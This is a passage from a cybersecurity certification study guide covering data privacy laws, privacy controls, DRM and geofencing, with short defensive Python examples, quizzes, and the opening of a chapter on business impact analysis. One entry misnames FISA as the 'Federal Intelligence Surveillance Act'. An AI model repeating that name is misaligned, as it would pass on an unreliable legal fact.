3. Third-party personnel should be familiarized with
organizational policies related to data privacy and
should sign which of the following?
a. NDA
b. MOU
c. ICA
d. SLA
4. Which of the following is a measure of how freely
data can be handled?
a. Sensitivity
b. Privacy
c. Secrecy
d. Criticality
5. Which of the following affects any organizations
that handle cardholder information for the major
credit card companies?
a. GLBA
b. PCI DSS
c. SOX
d. HIPAA
6. Which of the following affects all healthcare
facilities, health insurance companies, and
healthcare clearinghouses?
a. GLBA
b. PCI DSS
c. SOX
d. HIPAA
7. Which control provides data confidentiality?
a. Encryption
b. Hashing
c. Redundancy
d. Digital signatures
8. Which control provides data integrity?
a. Encryption
b. Hashing
c. Redundancy
d. Digital signatures
9. Which of the following means altering data from its
original state to protect it?
a. Deidentification
b. Data masking
c. DLP
d. Digital signatures
FOUNDATION TOPICS
PRIVACY VS. SECURITY
Privacy relates to rights to control the sharing and use
of one’s personal information, commonly called
personally identifiable information (PII), as described in
Chapter 15, “The Incident Response Process.” Privacy of
data relies heavily on the security controls that are in
place. While organizations can provide security without
ensuring data privacy, data privacy cannot exist without
the appropriate security controls. A privacy impact
assessment (PIA) is a risk assessment that determines
risks associated with PII collection, use, storage, and
transmission. A PIA should determine whether
appropriate PII controls and safeguards are
implemented to prevent PII disclosure or compromise.
The PIA should evaluate personnel, processes,
technologies, and devices. Any significant change should
result in another PIA review.
As part of prevention of privacy policy violations, any
contracted third parties that have access to PII should be
assessed to ensure that the appropriate controls are in
place. In addition, third-party personnel should be
familiarized with organizational policies and should sign
non-disclosure agreements (NDAs).
NON-TECHNICAL CONTROLS
Non-technical controls are implemented without
technology and consist of the organization’s policies and
procedures for maintaining data privacy and protection.
This section describes some of these non-technical
controls, which are also sometimes called administrative
controls. Non-technical controls are covered in detail in
Chapter 3, “Vulnerability Management Activities.”
Classification
Data classification helps to ensure that appropriate
security measures are taken with regard to sensitive data
types and is covered in Chapter 13, “The Importance of
Proactive Threat Hunting.”
Ownership
In Chapter 21, “The Importance of Frameworks, Policies,
Procedures, and Controls,” you will learn more about
policies that act as non-technical controls. One of those
policies is the data ownership policy, which is closely
related to the data classification policy (covered in Chapter 13). Often, the two policies are combined because,
typically, the data owner is tasked with classifying the
data. Therefore, the data ownership policy covers how
the owner of each piece of data or each data set is
identified. In most cases, the creator of the data is the
owner, but some organizations may deem all data
created by a department to be owned by the department
head. A user may also become the owner of data by bringing data into the organization that the user did not create; perhaps the data was purchased from a third
party. In any case, the data ownership policy should
outline both how data ownership occurs and the
responsibilities of the owner with respect to determining
the data classification and identifying those with access
to the data.
Retention
Another policy that acts as a non-technical control is the
data retention policy, which outlines how various data
types must be retained and may rely on the data
classifications described in the data classification policy.
Data retention requirements vary based on several
factors, including data type, data age, and legal and
regulatory requirements. Security professionals must
understand where data is stored and the type of data
stored. In addition, security professionals should provide
guidance on managing and archiving data securely.
Therefore, each data retention policy must be established
with the help of organizational personnel.
A data retention policy usually identifies the purpose of
the policy, the portion of the organization affected by the
policy, any exclusions to the policy, the personnel
responsible for overseeing the policy, the personnel
responsible for data destruction, the data types covered
by the policy, and the retention schedule. Security
professionals should work with data owners to develop
the appropriate data retention policy for each type of
data the organization owns. Examples of data types
include, but are not limited to, human resources data,
accounts payable/receivable data, sales data, customer
data, and e-mail. Designing a data retention policy is
covered more fully in the upcoming section “Retention
Standards.”
Data Types
Categorizing data types is a non-technical control for
ensuring data privacy and protection. To properly
categorize data types, a security analyst should be
familiar with some of the most sensitive types of data
that the organization may possess, as described in the
sections that follow.
Personally Identifiable Information (PII)
When considering technology and its use today, privacy
is a major concern of users. This privacy concern usually
involves three areas: which personal information can be
shared with whom, whether messages can be exchanged
confidentially, and whether and how one can send
messages anonymously. Privacy is an integral part of any
security measures that an organization takes. As part of
the security measures that organizations must take to
protect privacy, PII must be understood, identified, and
protected. Refer to Chapter 15 for more details about
protecting PII.
Personal Health Information (PHI)
PHI is a particular type of PII that an organization may
possess, particularly healthcare organizations. Chapter
15 also provides more details about protecting PHI.
Payment Card Information
Another type of PII that almost all companies possess is
credit card data. Holders of this data must protect it.
Many of the highest-profile security breaches that have
occurred have involved the theft of this data. The
Payment Card Industry Data Security Standard
(PCI DSS) applies to this type of data. The handling of
payment card information is covered in Chapter 5,
“Threats and Vulnerabilities Associated with Specialized
Technology.”
Retention Standards
Retention standards are another non-technical control
for ensuring data privacy and protection. To design a
data retention policy, an organization should answer the
following questions:
• What are the legal/regulatory requirements and
business needs for the data?
• What are the types of data?
• What are the retention periods and destruction
needs of the data?
The personnel who are most familiar with each data type
should work with security professionals to determine the
data retention policy. For example, human resources
personnel should help design the data retention policy
for all human resources data. While designing a data
retention policy, the organization must consider the
media and hardware that will be used to retain the data.
Then, with this information in hand, the data retention
policy should be drafted and formally adopted by the
organization and/or business unit.
Once a data retention policy has been created, personnel
must be trained to comply with it. Auditing and
monitoring should be configured to ensure data
retention policy compliance. Periodically, data owners
and processors should review the data retention policy to
determine whether any changes need to be made. All
data retention policies, implementation plans, training,
and auditing should be fully documented.
Remember that for most organizations, a one-size-fits-all
solution is impossible because of the different types of
data. Only those most familiar with each data type can
determine the best retention policy for that data. While a
security professional should be involved in designing the data retention policies, that role is advisory: providing expertise when needed and ensuring that data security is always considered and that the policies satisfy organizational needs.
Confidentiality
The three fundamentals of security are confidentiality,
integrity, and availability (CIA). Most security issues
result in a violation of at least one facet of the CIA triad.
Understanding these three security principles will help
security professionals ensure that the security controls
and mechanisms implemented protect at least one of
these principles.
To ensure confidentiality, you must prevent the
disclosure of data or information to unauthorized
entities. As part of confidentiality, the sensitivity level of
data must be determined before any access controls are
put in place. Data with a higher sensitivity level will have
more access controls in place than data with a lower
sensitivity level. The opposite of confidentiality is
disclosure. Most security professionals consider
confidentiality as it relates to data on a network or
devices. However, data can also exist in printed format.
Appropriate controls should be put into place to protect
data on a network, but data in its printed format needs to
be protected, too, which involves implementing data
disposal policies. Examples of controls that improve
confidentiality include encryption, steganography, access
control lists (ACLs), and data classification.
Legal Requirements
Legal requirements are a form of non-technical controls
that can mandate technical controls. In some cases, the
design of controls will be driven by legal requirements
that apply to the organization based on the industry or
sector in which it operates. In Chapter 15 you learned the
importance of recognizing legal responsibilities during
an incident response. Let’s examine some of the laws and
regulations that may come into play.
The United States and European Union (EU) both have
established laws and regulations that affect organizations
that operate within their area of governance. While
security professionals should strive to understand laws
and regulations, security professionals may not have the
level of knowledge and background to fully interpret
these laws and regulations to protect their organization.
In these cases, security professionals should work with
legal representation regarding legislative or regulatory
compliance.
Security analysts must be aware of the laws and, at a
minimum, understand how the laws affect the operations
of their organization. For example, a security
professional working for a healthcare facility would need
to understand all security guidelines in HIPAA and
PPACA, described next. The following are the most
significant laws that may affect an organization and its
security policy:
• Sarbanes-Oxley Act (SOX): Also known as the
Public Company Accounting Reform and Investor
Protection Act of 2002, affects any organization
that is publicly traded in the United States. It
controls the accounting methods and financial
reporting for the organizations and stipulates
penalties and even jail time for executive officers.
• Health Insurance Portability and
Accountability Act (HIPAA): Also known as
the Kennedy-Kassebaum Act, affects all
healthcare facilities, health insurance companies,
and healthcare clearinghouses. It is enforced by
the Office for Civil Rights (OCR) of the Department of Health and Human Services (HHS). It provides
standards and procedures for storing, using, and
transmitting medical information and healthcare
data. HIPAA overrides state laws unless the state
laws are stricter. It was itself amended by the Patient Protection and Affordable Care Act (PPACA), commonly known as Obamacare.
• Gramm-Leach-Bliley Act (GLBA) of 1999:
Affects all financial institutions, including banks,
loan companies, insurance companies, investment
companies, and credit card providers. It provides
guidelines for securing all financial information
and prohibits sharing financial information with
third parties. This act directly affects the security
of PII.
• Computer Fraud and Abuse Act (CFAA) of
1986: Affects any entities that engage in hacking
of “protected computers,” as defined in the act. It
was amended in 1989, 1994, and 1996; in 2001 by
the USA PATRIOT Act (listed below); in 2002;
and in 2008 by the Identity Theft Enforcement
and Restitution Act. A “protected computer” is a
computer used exclusively by a financial
institution or the U.S. government or used in or
affecting interstate or foreign commerce or
communication, including a computer located
outside the United States that is used in a manner
that affects interstate or foreign commerce or
communication of the United States. Due to the interstate nature of most Internet communication, any ordinary computer, including a cell phone, has come under the jurisdiction of the law. The law includes several definitions of
hacking, including knowingly accessing a
computer without authorization; intentionally
accessing a computer to obtain financial records,
U.S. government information, or protected
computer information; and transmitting
fraudulent commerce communication with the
intent to extort.
• Federal Privacy Act of 1974: Affects any
computer that contains records used by a federal agency. It provides guidelines on the collection, maintenance, use, and dissemination of PII about individuals that is maintained in systems of records by federal agencies.
• Federal Intelligence Surveillance Act
(FISA) of 1978: Affects law enforcement and
intelligence agencies. It was the first act to give
procedures for the physical and electronic
surveillance and collection of “foreign intelligence
information” between “foreign powers” and
“agents of foreign powers” and applied only to
traffic within the United States. It was amended
by the USA PATRIOT Act of 2001 and the FISA
Amendments Act of 2008.
• Electronic Communications Privacy Act
(ECPA) of 1986: Affects law enforcement and
intelligence agencies. It extended government
restrictions on wiretaps from telephone calls to
include transmissions of electronic data by
computer and prohibited access to stored
electronic communications. It was amended by
the Communications Assistance to Law
Enforcement Act (CALEA) of 1994, the USA
PATRIOT Act of 2001, and the FISA Amendments
Act of 2008.
• Computer Security Act of 1987: Superseded
in 2002 by FISMA (listed below), the first law to
require a formal computer security plan. It was
written to protect and defend the sensitive
information in the federal government systems
and provide security for that information. It also
placed requirements on government agencies to
train employees and identify sensitive systems.
• United States Federal Sentencing
Guidelines of 1991: Affects individuals and
organizations convicted of felonies and serious
(Class A) misdemeanors. It provides guidelines to
prevent sentencing disparities that existed across
the United States.
• Communications Assistance for Law
Enforcement Act (CALEA) of 1994: Affects
law enforcement and intelligence agencies. It
requires telecommunications carriers and
manufacturers of telecommunications equipment
to modify and design their equipment, facilities,
and services to ensure that they have built-in
surveillance capabilities. This allows federal
agencies to monitor all telephone, broadband
Internet, and voice over IP (VoIP) traffic in real
time.
• Personal Information Protection and
Electronic Documents Act (PIPEDA):
Affects how private-sector organizations collect,
use, and disclose personal information in the
course of commercial business in Canada. The act
was written to address EU concerns about the
security of PII in Canada. The law requires
organizations to obtain consent when they collect,
use, or disclose personal information and to have
personal information policies that are clear,
understandable, and readily available.
• Basel II: Affects financial institutions. It
addresses minimum capital requirements,
supervisory review, and market discipline. Its
main purpose is to protect against risks that banks
and other financial institutions face.
• Federal Information Security
Management Act (FISMA) of 2002: Affects
every federal agency. It requires federal agencies
to develop, document, and implement an
agencywide information security program.
• Economic Espionage Act of 1996: Affects
companies that have trade secrets and any
individuals who plan to use encryption technology
for criminal activities. This act covers a multitude
of issues because of the way it was structured. A
trade secret does not need to be tangible to be
protected by this act. Per this law, theft of a trade
secret is now a federal crime, and the United
States Sentencing Commission must provide
specific information in its reports regarding
encryption or scrambling technology that is used
illegally.
• USA PATRIOT Act of 2001: Formally known as
Uniting and Strengthening America by Providing
Appropriate Tools Required to Intercept and
Obstruct Terrorism, it affects law enforcement
and intelligence agencies in the United States. Its
purpose is to enhance the investigatory tools that
law enforcement can use, including e-mail
communications, telephone records, Internet
communications, medical records, and financial
records. When this law was enacted, it amended
several other laws, including FISA and the ECPA
of 1986. The USA PATRIOT Act does not restrict
private citizens’ use of investigatory tools,
although there are some exceptions—for example,
if the private citizen is acting as a government
agent (even if not formally employed), if the
private citizen conducts a search that would
require law enforcement to have a warrant, if the
government is aware of the private citizen’s
search, or if the private citizen is performing a
search to help the government.
• Health Care and Education Reconciliation
Act of 2010: Affects healthcare and educational
organizations. This act increased some of the
security measures that must be taken to protect
healthcare information.
• Employee Privacy Issues and Expectation
of Privacy: Employee privacy issues must be
addressed by all organizations to ensure that the
organizations are protected from costly legal
penalties that result from data breaches. However,
organizations must give employees the proper
notice of any monitoring that might be used.
Organizations must also ensure that the
monitoring of employees is applied in a consistent
manner. Many organizations implement a no-expectation-of-privacy policy that the employee
must sign after receiving the appropriate training.
This policy should specifically describe any
unacceptable behavior. Companies should also
keep in mind that some actions are protected by
the Fourth Amendment. Security professionals
and senior management should consult with legal
counsel when designing and implementing any
monitoring solution.
• European Union: The EU has implemented
several laws and regulations that affect security
and privacy. The EU Principles on Privacy include
strict laws to protect private data. The EU’s Data
Protection Directive provides direction on how to
follow the laws set forth in the principles. The EU
created the Safe Harbor Privacy Principles to help
guide U.S. organizations in compliance with the
EU Principles on Privacy. The following are some
of the guidelines as updated by the General Data
Protection Regulation (GDPR). Personal data may
not be processed unless there is at least one legal
basis to do so. Article 6 states that the lawful bases for processing are
• If the data subject has given consent to the
processing of his or her personal data
• To fulfill contractual obligations with a data
subject, or for tasks at the request of a data
subject who is in the process of entering into a
contract
• To comply with a data controller's legal obligations
• To protect the vital interests of a data subject or
another individual
• To perform a task in the public interest or in
official authority
• For the legitimate interests of a data controller or
a third party, unless these interests are overridden
by interests of the data subject or her or his rights
according to the Charter of Fundamental Rights
(especially in the case of children)
Note
Do not confuse the terms safe harbor and data haven. According to the EU, a
safe harbor is an entity that conforms to all the requirements of the EU
Principles on Privacy. A data haven is a country that fails to legally protect
personal data, often with the aim of attracting companies engaged in collecting such data.
The EU Electronic Signatures Directive defines electronic
signature principles. In this directive, a signature must
be uniquely linked to the signer and to the data to which
it relates so that any subsequent data change is
detectable. The signature must be capable of identifying
the signer.
Data Sovereignty
Data sovereignty is the concept that data stored in
digital format is subject to the laws of the country in
which the data is located. Affecting this concept are the
differing privacy laws and regulations issued by nations
and governing bodies. This concept is further
complicated by the deploying of cloud solutions.
Many countries have adopted legislation that requires
customer data to be kept within the country in which the
customer resides. But organizations are finding it
increasingly difficult to ensure that this is the case when
working with service providers and other third parties.
Organizations should review the service-level agreements (SLAs) with these providers to verify compliance.
Keep in mind, however, that the laws of multiple
countries may affect the data. For instance, suppose an
organization in the United States is using a data center in
the United States but the data center is operated by a
company from France. The data would then be subject to
both U.S. and EU laws and regulations.
Another factor would be the type of data being stored, as
different types of data are regulated differently.
Healthcare data and consumer data, for example, are subject to vastly different laws that regulate their transportation and storage.
Security professionals should answer the following
questions:
• Where is the data stored?
• Who has access to the data?
• Where is the data backed up?
• How is the data encrypted?
The answers to these four questions will help security
professionals design a governance strategy for their
organization that will aid in addressing any data
sovereignty concerns. Remember that the responsibility
to meet data regulations falls on both the organization
that owns the data and the vendor providing the data
storage service, if any.
Data Minimization
Organizations should minimize the amount of personal
data they store to what is necessary. An important
principle in the European Union’s General Data
Protection Regulation (GDPR) is data minimization.
Data processing should use only as much data as is required to accomplish a given task. Reducing the amount of personal data stored also reduces the attack surface.
Purpose Limitation
Another key principle in the European Union’s GDPR
that is finding wide adoption is that of purpose
limitation. Personal data collected for one purpose
cannot be repurposed without further consent from the
individual. For example, data collected to track a disease
outbreak cannot be used to identify individuals.
Non-disclosure agreement (NDA)
In Chapter 15 you learned about various types of
intellectual property, such as patents, copyrights, and
trade secrets. Most organizations that have trade secrets
attempt to protect them by using NDAs. An NDA must
be signed by any entity that has access to information
that is part of a trade secret. Anyone who signs an NDA
will suffer legal consequences if the organization is able
to prove that the signer violated it.
TECHNICAL CONTROLS
Technical controls are implemented with technology and
include items such as firewalls, access lists (ACLs),
permissions on files and folders, and devices that
identify and prevent threats. After an organization understands the threats it faces, it needs to establish their likelihoods and impacts and to select controls that, while addressing a threat, do not cost more than the loss that would result if the threat were realized. The review of these controls should be an ongoing process.
Encryption
In Chapter 8, “Security Solutions for Infrastructure
Management,” you learned about encryption and
cryptography. These technologies comprise a technical
control that can be used to provide the confidentiality
objective of the CIA triad. Information assets can be
protected from being accessed by unauthorized parties
by encrypting data at rest (while stored) and data in
transit (when crossing a network). As you also learned,
cryptography in the form of hashing algorithms can also
provide a way to assess data integrity.
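As a minimal sketch of encrypting data at rest, the following Python example uses the Fernet recipe from the third-party cryptography package (an authenticated, AES-based scheme); the key handling is deliberately simplified for illustration:

from cryptography.fernet import Fernet

key = Fernet.generate_key()        # in practice, protect this key in a KMS or HSM
cipher = Fernet(key)
ciphertext = cipher.encrypt(b"SSN: 123-45-6789")  # stored data is now unreadable
plaintext = cipher.decrypt(ciphertext)            # possible only with the key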
Data Loss Prevention (DLP)
Chapter 12, “Implementing Configuration Changes to
Existing Controls to Improve Security,” described data
loss prevention (DLP) systems. As you learned, DLP
systems are used to prevent data exfiltration, which is
the intentional or unintentional loss of sensitive data
from the network. DLP comprises a strong technical
control that protects both integrity and confidentiality.
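As a toy illustration only (commercial DLP products rely on keyword dictionaries, document fingerprinting, and statistical analysis rather than a couple of regular expressions), the following Python sketch shows the content-inspection idea at the heart of DLP:

import re

# Hypothetical patterns for two common sensitive data types.
PATTERNS = {
    "possible SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "possible card number": re.compile(r"\b(?:\d[ -]?){12}\d{3,4}\b"),
}

def scan_outbound(text):
    return [label for label, pattern in PATTERNS.items() if pattern.search(text)]

hits = scan_outbound("Attaching the invoice for card 4111 1111 1111 1111.")
print(hits)  # a real DLP agent would block, quarantine, or alert instead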
Data Masking
Data masking means altering data from its original
state to protect it. You already learned about two forms
of masking, encryption (storing the data in an encrypted
form) and hashing (storing a hash value, generated from
the data by a hashing algorithm, rather than the data
itself). Many passwords are stored as hash values.
The following are some other methods of data masking:
• Using substitution tables and aliases for the data
• Redacting or replacing the sensitive data with a
random value
• Averaging individual values (adding them and then dividing by the number of individual values) or aggregating them (totaling them and using only the total value)
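The following Python sketch illustrates three of these masking approaches on hypothetical values (substitution, hashing, and averaging/aggregation):

import hashlib
import statistics

salaries = [52000, 61000, 58000, 75000]   # hypothetical source values

alias = "EMPLOYEE-001"                    # substitution: an alias replaces the real name
ssn_hash = hashlib.sha256(b"123-45-6789").hexdigest()  # hashing: store the digest, not the SSN
average = statistics.mean(salaries)       # averaging: release only the mean (61500)
total = sum(salaries)                     # aggregating: release only the total (246000)
print(alias, ssn_hash[:16], average, total)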
Deidentification
Data deidentification or data anonymization is the
process of deleting or masking personal identifiers, such
as personal names, from a set of data. Deidentification is
often done when the data is being used in the aggregate,
such as when medical data is used for research. It is a
technical control that is used as one of the main
approaches to ensuring data privacy protection.
Tokenization
Tokenization is another form of data hiding or
masking in that it replaces a value with a token that is
used instead of the actual value. For example,
tokenization is an emerging standard for mobile
transactions; numeric tokens are used to protect
cardholders’ sensitive credit and debit card information.
This is a great security feature that substitutes the
primary account number with a numeric token that can
be processed by all participants in the payment
ecosystem. Figure 19-1 shows the use of tokens in a credit
card transaction using a smartphone.
Figure 19-1 Tokenization
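Conceptually, a token vault is a protected mapping that only authorized payment systems can reverse. The following minimal Python sketch (the token format and vault are illustrative only, not taken from any payment standard) shows the idea:

import secrets

vault = {}  # in production, a hardened token vault, never an in-memory dict

def tokenize(pan: str) -> str:
    token = "tok_" + secrets.token_hex(8)  # random value that carries no card data
    vault[token] = pan
    return token

def detokenize(token: str) -> str:
    return vault[token]  # restricted to authorized payment systems

t = tokenize("4111111111111111")
print(t)              # safe to pass through the payment ecosystem
print(detokenize(t))  # only the vault can reverse the mapping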
Digital Rights Management (DRM)
Hardware manufacturers, publishers, copyright holders,
and individuals use digital rights management
(DRM) to control the use of digital content. DRM often
also involves device controls. First-generation DRM
software controls copying. Second-generation DRM
software controls executing, viewing, copying, printing,
and altering works or devices.
The U.S. Digital Millennium Copyright Act
(DMCA) of 1998 imposes criminal penalties on those
who make available technologies whose primary purpose
is to circumvent content protection technologies. DRM
includes restrictive license agreements and encryption.
DRM protects computer games and other software,
documents, e-books, films, music, and television.
In most enterprise implementations, the primary
concern is the DRM control of documents by using open,
edit, print, or copy access restrictions that are granted on
a permanent or temporary basis. Solutions can be
deployed that store the protected data in a central or
decentralized model. Encryption is used in the DRM
implementation to protect the data both at rest and in
transit.
Today’s DRM implementations include the following:
• Directories:
• Lightweight Directory Access Protocol (LDAP)
• Active Directory (AD)
• Custom
• Permissions:
• Open
• Print
• Modify
• Clipboard
• Additional controls:
• Expiration (absolute, relative, immediate
revocation)
• Version control
• Change policy on existing documents
• Watermarking
• Online/offline
• Auditing
• Ad hoc and structured processes:
• User initiated on desktop
• Mapped to system
• Built into workflow process
Document DRM
Organizations implement DRM to protect confidential or
sensitive documents and data. Commercial DRM
products allow organizations to protect documents and
include the capability to restrict and audit access to
documents. Some of the permissions that can be
restricted using DRM products include reading and
modifying a file, removing and adding watermarks,
downloading and saving a file, printing a file, or even
taking screenshots. If a DRM product is implemented,
the organization should ensure that the administrator is
properly trained and that policies are in place to ensure
that rights are appropriately granted and revoked.
Music DRM
DRM has been used in the music industry for some time
now. Subscription-based music services, such as
Napster, use DRM to revoke a user’s access to
downloaded music once their subscription expires. While
technology companies have petitioned the music
industry to allow them to sell music without DRM, the
industry has been reluctant to do so.
Movie DRM
While the movie industry has used a variety of DRM
schemes over the years, two main technologies are used
for the mass distribution of media:
• Content Scrambling System (CSS): Uses
encryption to enforce playback and region
restrictions on DVDs. This system can be broken
using Linux’s DeCSS tool.
• Advanced Access Content System (AACS):
Protects Blu-ray and HD DVD content. Hackers
have been able to obtain the encryption keys to
this system.
This industry continues to make advances to prevent
hackers from creating unencrypted copies of copyrighted
material.
Video Game DRM
Most video game DRM implementations rely on
proprietary consoles that use Internet connections to
verify video game licenses. Most consoles today verify
the license upon installation and allow unrestricted use
from that point. However, to obtain updates, the license
will again be verified prior to download and installation
of the update.
E-Book DRM
E-book DRM is considered to be the most successful
DRM deployment. Both Amazon’s Kindle and Barnes & Noble’s Nook devices implement DRM to protect electronic forms of books. Both of these companies have released mobile apps that function like the physical e-book devices.
Today’s implementation uses a decryption key that is
installed on the device. This means that the e-books
cannot be easily copied between e-book devices or
applications. Adobe created the Adobe Digital
Experience Protection Technology (ADEPT) that is used
by most e-book readers except Amazon’s Kindle. With
ADEPT, AES is used to encrypt the media content, and
RSA encrypts the AES key.
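This pattern, a symmetric key protecting the content and an asymmetric key protecting the symmetric key, is classic hybrid encryption. The following is a minimal Python sketch of the general pattern using the cryptography package (this is not ADEPT itself, and the AES-based Fernet recipe stands in for the content cipher):

from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

device_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

content_key = Fernet.generate_key()                        # symmetric key for the content
ciphertext = Fernet(content_key).encrypt(b"chapter 1 ...")
wrapped_key = device_key.public_key().encrypt(content_key, oaep)  # RSA protects the key

# On the authorized device: unwrap the content key, then decrypt the content.
recovered = Fernet(device_key.decrypt(wrapped_key, oaep)).decrypt(ciphertext)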
Watermarking
Digital watermarking is another method used to
deter unauthorized use of a document. Digital
watermarking involves embedding a logo or trademark
in documents, pictures, or other objects. The watermark
deters people from using the materials in an
unauthorized manner.
Geographic Access Requirements
At one time, cybersecurity professionals knew that all the
network users were safely in the office and behind a
secure perimeter created and defended with every tool
possible. That is no longer the case. Users now access
your network from home, wireless hotspots, hotel rooms,
and all sorts of other locations that are less than secure.
When you design authentication, you can consider the
physical location of the source of an access request. A
scenario for this might be that Alice is allowed to access
the Sales folder at any time from the office but only from
9 a.m. to 5 p.m. from her home and never from
elsewhere.
Authentication systems can also use location to flag attempts to authenticate and access a resource from two distant locations within a very short span of time, one of which is likely fraudulent.
Finally, these systems can sometimes make real-time
assessments of threat levels in the region where a request
originates. Geofencing is the application of geographic
limits to where a device can be used. It depends on the
use of Global Positioning System (GPS) or radio
frequency identification (RFID) technology to create a
virtual geographic boundary.
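As a rough sketch of the underlying check, the following Python function (the office coordinates and fence radius are hypothetical) decides whether a reported GPS position falls inside a circular geofence:

import math

def haversine_km(lat1, lon1, lat2, lon2):
    # Great-circle distance between two latitude/longitude points.
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))  # Earth radius of about 6371 km

OFFICE = (40.7128, -74.0060)  # hypothetical office location
RADIUS_KM = 0.5               # hypothetical fence radius

def inside_fence(lat, lon):
    return haversine_km(lat, lon, *OFFICE) <= RADIUS_KM

print(inside_fence(40.7130, -74.0055))  # True: request originates inside the fence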
Access Controls
Chapter 8 covered identity and access management
systems in depth. Along with encryption, access controls
are the main security controls implemented to ensure
confidentiality. In Chapter 21, “The Importance of
Frameworks, Policies, Procedures, and Controls,” you
will learn how access controls fit into the set of controls
used to maintain security.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 19-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 19-2 Key Topics in Chapter 19
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
privacy, Sarbanes-Oxley Act (SOX)
Health Insurance Portability and Accountability Act
(HIPAA)
Gramm-Leach-Bliley Act (GLBA) of 1999
Computer Fraud and Abuse Act (CFAA)
Federal Privacy Act of 1974
Federal Intelligence Surveillance Act (FISA) of 1978
Electronic Communications Privacy Act (ECPA) of
1986
Computer Security Act of 1987
United States Federal Sentencing Guidelines of 1991
Personal Information Protection and Electronic
Documents Act (PIPEDA)
Basel II
Federal Information Security Management Act
(FISMA) of 2002
Economic Espionage Act of 1996
USA PATRIOT Act of 2001
Health Care and Education Reconciliation Act of 2010
employee privacy issues and expectation of privacy
data sovereignty
data masking
deidentification
tokenization
digital rights management (DRM)
U.S. Digital Millennium Copyright Act (DMCA) of
1998
Content Scrambling System (CSS)
Advanced Access Content System (AACS)
digital watermarking
geofencing
REVIEW QUESTIONS
1. Data should be classified based on its ________ to
the organization.
2. List at least two considerations when assigning a
level of criticality.
3. Match the following terms with their definitions.
4. A ________________ policy outlines how
various data types must be retained and may rely
on the data classifications described in the data
classification policy.
5. According to the GDPR, personal data may not be
processed unless there is at least one legal basis to
do so. List at least two of these legal bases.
6. Match the following terms with their definitions.
7. _________________ means altering data from
its original state to protect it.
8. List at least one method of data masking.
9. Match the following terms with their definitions.
10. _________________ is the application of
geographic limits to where a device can be used.
Chapter 20. Applying
Security Concepts in
Support of Organizational
Risk Mitigation
This chapter covers the following topics related
to Objective 5.2 (Given a scenario, apply security
concepts in support of organizational risk
mitigation) of the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 certification exam:
• Business impact analysis: Describes how to
assess the level of criticality of business functions
to the overall organization
• Risk identification process: Includes
classification, ownership, retention, data types,
retention standards, and confidentiality
• Risk calculation: Covers probability and
magnitude
• Communication of risk factors: Discusses the
process of sharing with critical parties
• Risk prioritization: Includes security controls
and engineering tradeoffs
• System assessment: Describes the process of
system assessment
• Documented compensating controls: Covers
the use of additional controls
• Training and exercises: Includes red team,
blue team, white team, and tabletop exercise
• Supply chain assessment: Covers vendor due
diligence and hardware source authenticity
The risk management process is a formal method of
evaluating vulnerabilities. A robust risk management
process will identify vulnerabilities that need to be
addressed and will generate an assessment of the impact
and likelihood of an attack that takes advantage of the
vulnerability. The process also includes a formal
assessment of possible risk mitigations. This chapter
explores the types of risk management processes and
how they are used to mitigate risk.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these nine self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 20-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 20-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is the first step in the BIA?
a. Identify resource requirements.
b. Identify outage impacts and estimate
downtime.
c. Identify critical processes and resources.
d. Identify recovery priorities.
2. Which of the following is not a goal of risk
assessment?
a. Identify vulnerabilities and threats.
b. Identify key stakeholders.
c. Identify assets and asset value.
d. Calculate threat probability and business
impact.
3. Which of the following is the monetary impact of
each threat occurrence?
a. ALE
b. SLE
c. AV
d. EF
4. The non-technical leadership audience needs which
of the following to be stressed in the
communication of risk factors to stakeholders?
a. The technical risks
b. Security operations difficulties
c. The cost of cybersecurity expenditures
d. Translation of technical risk into common
business terms
5. Which of the following processes involves
terminating the activity that causes a risk or
choosing an alternative that is not as risky?
a. Risk avoidance
b. Risk transfer
c. Risk mitigation
d. Risk acceptance
6. Which of the following occurs when the adequacy
of a system’s overall security is accepted by
management?
a. Certification
b. Accreditation
c. Acceptance
d. Due diligence
7. To implement ISO/IEC 27001:2013, the project
manager should complete which step first?
a. Identify the requirements
b. Obtain management support
c. Perform risk assessment and risk treatment
d. Define the ISMS scope, information security
policy, and information security objectives
8. Which of the following are in place to substitute for
a primary access control and mainly act to mitigate
risks?
a. Compensating controls
b. Secondary controls
c. Accommodating controls
d. Directive controls
9. Which team acts as the attacking force?
a. Green
b. Red
c. Blue
d. White
FOUNDATION TOPICS
BUSINESS IMPACT
ANALYSIS
A business impact analysis (BIA) is a functional
analysis that occurs as part of business continuity and
planning for disaster recovery. Performing a thorough
BIA will help business units understand the impact of a
disaster. The resulting document that is produced from a
BIA lists the critical and necessary business functions,
their resource dependencies, and their level of criticality
to the overall organization.
The BIA helps the organization to understand what
impact a disruptive event would have on the
organization. It is a management-level analysis that
identifies the impact of losing an organization’s
resources.
The four main steps of the BIA are as follows:
1. Identify critical processes and resources.
2. Identify outage impacts and estimate downtime.
3. Identify resource requirements.
4. Identify recovery priorities.
The BIA relies heavily on any vulnerability analysis and
risk assessment that is completed. The vulnerability
analysis and risk assessment may be performed by the
Business Continuity Planning (BCP) committee
or by a separately appointed risk assessment team.
